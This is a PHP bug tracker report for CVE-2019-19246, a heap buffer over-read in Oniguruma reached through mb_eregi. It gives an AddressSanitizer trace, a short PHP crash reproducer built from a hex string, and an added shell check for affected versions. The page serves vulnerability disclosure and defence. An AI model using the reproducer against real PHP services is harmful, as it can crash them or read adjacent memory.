CVE-2019-19246: Heap buffer overflow in mb_eregi

Oniguruma through 6.9.3, as used in PHP 7.3.x and other products, has a heap-based buffer over-read in str_lower_case_match in regexec.c.


Sec Bug #78559: Heap buffer overflow in mb_eregi

Submitted: 2019-09-18 10:48 UTC
Modified: 2019-09-24 04:50 UTC
From: [email protected]
Assigned: stas
Status: Closed
Package: mbstring related
PHP Version: 7.3.9
OS:
Private report: No
CVE-ID: None

[2019-09-18 10:48 UTC] [email protected]

Description:

Against libonig 2.9.3 the test script gives:

=================================================================
==17768==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000023727 at pc 0x00000184bd62 bp 0x7ffda9f2f1d0 sp 0x7ffda9f2f1c8
READ of size 1 at 0x603000023727 thread T0
    #0 0x184bd61 in str_lower_case_match /home/nikic/libonig/src/regexec.c:4017:11
    #1 0x184bd61 in slow_search_ic /home/nikic/libonig/src/regexec.c:4040:9
    #2 0x184bd61 in forward_search_range /home/nikic/libonig/src/regexec.c:4355:9
    #3 0x18487df in onig_search_with_param /home/nikic/libonig/src/regexec.c:4778:17
    #4 0x1847554 in onig_search /home/nikic/libonig/src/regexec.c:4574:7
    #5 0xa99ad0 in _php_mb_onig_search /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:878:8
    #6 0xa99ad0 in _php_mb_regex_ereg_exec /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:936:6
    #7 0x168f607 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:1326:2
    #8 0x148597c in execute_ex /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:54074:7
    #9 0x148605c in zend_execute /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:58355:2
    #10 0x130625f in zend_execute_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4
    #11 0x10f0935 in php_execute_script /home/nikic/php-src-fuzz/main/main.c:2587:14
    #12 0x17979c0 in do_cli /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:961:5
    #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:1352:18
    #14 0x7ff709f62b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/…/csu/libc-start.c:310
    #15 0x447139 in _start (/home/nikic/php-src-fuzz/sapi/cli/php+0x447139)

0x603000023727 is located 0 bytes to the right of 23-byte region [0x603000023710,0x603000023727)
allocated by thread T0 here:
    #0 0x4bf03d in malloc (/home/nikic/php-src-fuzz/sapi/cli/php+0x4bf03d)
    #1 0x17f44c0 in set_optimize_exact /home/nikic/libonig/src/regcomp.c:5687:25
    #2 0x17f44c0 in set_optimize_info_from_tree /home/nikic/libonig/src/regcomp.c:5800:11
    #3 0x17f44c0 in onig_compile /home/nikic/libonig/src/regcomp.c:6194:7
    #4 0x1817d6e in onig_new /home/nikic/libonig/src/regcomp.c:6356:7
    #5 0xaa018d in php_mbregex_compile_pattern /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:467:19
    #6 0xa99a48 in _php_mb_regex_ereg_exec /home/nikic/php-src-fuzz/ext/mbstring/php_mbregex.c:927:7
    #7 0x168f607 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:1326:2
    #8 0x148597c in execute_ex /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:54074:7
    #9 0x148605c in zend_execute /home/nikic/php-src-fuzz/Zend/zend_vm_execute.h:58355:2
    #10 0x130625f in zend_execute_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4
    #11 0x10f0935 in php_execute_script /home/nikic/php-src-fuzz/main/main.c:2587:14
    #12 0x17979c0 in do_cli /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:961:5
    #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php_cli.c:1352:18
    #14 0x7ff709f62b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/…/csu/libc-start.c:310

Test script:

<?php
// Crash reproducer from the report: the same byte string, decoded from hex,
// is used as both the case-insensitive pattern and the subject.
$str = "5b5b5b5b5b5b5b492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c52525252525252525252525252525252525252525252525252492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c1cceb04b5d1cceb07a73717e4b1c302c36303030ceb07b7bd2a15c305c30663f436f6e74655c5238416711087b363030302c36303030ceb07b7b7b7b7b7b7b363030302c36303030ceb07b7b7b7b7b7b7b4a01";
$str = hex2bin($str);
var_dump(mb_eregi($str, $str));
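An added exposure check, written for this page and not taken from the bug report or from PHP: it reads the Oniguruma version a PHP build reports and decides whether it falls inside the range the CVE text gives (through 6.9.3). The phpinfo row label is assumed from what "php -i" prints for mbstring, and the sample text is constructed.

```shell
#!/bin/sh
# Added example (not from the bug report): is an Oniguruma version string inside
# the range CVE-2019-19246 describes ("through 6.9.3")?  Newer is treated as fixed.
# Exit status: 0 = affected, 1 = not affected, 2 = unparseable version.
onig_affected() {
  ver=$1
  case "$ver" in
    '' | [!0-9]* | *[!0-9.]*) return 2 ;;   # empty, or not "digits and dots"
  esac
  # Split MAJOR.MINOR.PATCH with parameter expansion; absent fields default to 0.
  maj=${ver%%.*};  rest=${ver#"$maj"}; rest=${rest#.}
  min=${rest%%.*}; rest=${rest#"$min"}; rest=${rest#.}
  pat=${rest%%.*}
  maj=${maj:-0}; min=${min:-0}; pat=${pat:-0}
  if [ "$maj" -lt 6 ]; then return 0; fi
  if [ "$maj" -gt 6 ]; then return 1; fi
  if [ "$min" -lt 9 ]; then return 0; fi
  if [ "$min" -gt 9 ]; then return 1; fi
  [ "$pat" -le 3 ]                         # 6.9.0 .. 6.9.3 affected, 6.9.4+ not
}

# Same decision as a printed number (0/1/2), convenient for scripts and checks.
onig_affected_status() {
  if onig_affected "$1"; then echo 0; else echo $?; fi
}

# Pull the Oniguruma version out of phpinfo text on stdin: the
# "Multibyte regex (oniguruma) version => X.Y.Z" row that "php -i" prints.
onig_version_from_phpinfo() {
  sed -n 's/^Multibyte regex (oniguruma) version => //p' | head -n 1
}

# Constructed sample of the relevant phpinfo rows (not captured from a real host).
SAMPLE_PHPINFO='mbstring
Multibyte regex (oniguruma) support => enabled
Multibyte regex (oniguruma) version => 6.9.3'

# Live use would be:  php -i | onig_version_from_phpinfo
ver=$(printf '%s\n' "$SAMPLE_PHPINFO" | onig_version_from_phpinfo)
case "$(onig_affected_status "$ver")" in
  0) echo "oniguruma $ver: inside the affected range, move to a fixed build" ;;
  1) echo "oniguruma $ver: outside the affected range" ;;
  *) echo "could not determine the oniguruma version" ;;
esac
```

A distribution build may carry a backported fix without changing the version it reports, so treat an "affected" result as a prompt to check the package changelog rather than as proof.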


History


[2019-09-18 12:11 UTC] [email protected]

It looks like this is already fixed with current oniguruma master.

[2019-09-20 17:05 UTC] [email protected]

-Status: Open
+Status: Analyzed
-Assigned To:
+Assigned To: stas

[2019-09-24 04:51 UTC] [email protected]

-Status: Analyzed
+Status: Closed
